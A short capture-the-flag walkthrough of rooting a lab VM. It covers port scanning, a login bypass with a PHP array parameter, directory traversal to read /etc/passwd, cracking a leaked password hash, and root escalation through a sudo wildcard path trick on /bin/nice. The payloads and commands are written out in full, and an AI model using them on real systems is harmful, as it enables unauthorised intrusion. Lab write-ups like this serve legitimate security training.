I start off with an nmap scan:

$ nmap -sC -sV 192.168.55.101            
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
|   256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_  256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running directory bruteforce on port 80:
$ dirb http:///192.168.55.101
+ http:///192.168.55.101/admin (CODE:301|SIZE:316)                          
+ http:///192.168.55.101/index.php (CODE:200|SIZE:245)                      
+ http:///192.168.55.101/server-status 

Following the admin page, there is a login page. Next is to trying to bypass the login.
Trying different sql injection tricks do not yield anything on this page. I proceed to intercept the request using Burp to investigate further.

A blank variable is able to bypass the login form username=admin&password[]=admin. Now am presented with a dashboard.

The only page that looks promising is http://192.168.122.101/admin/dashboard.php?page=log
I will test how to read system files using this. Directory traversal is possible doing something like file=../../../../../../etc/passwd

For this user a hash was left, time to try and crack it: webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash

Running john against it yields the password and that way with creds webadmin:dragon am able to ssh in.


Now onwards to privelege escalation.
webadmin@serv:~$ sudo -l
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
    
webadmin@serv:~$ nano test.sh
webadmin@serv:~$ chmod 777 test.sh
webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/test.sh 
[sudo] password for webadmin: 
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)
root@serv:/home/webadmin# whoami
root

And that way the box is rooted!
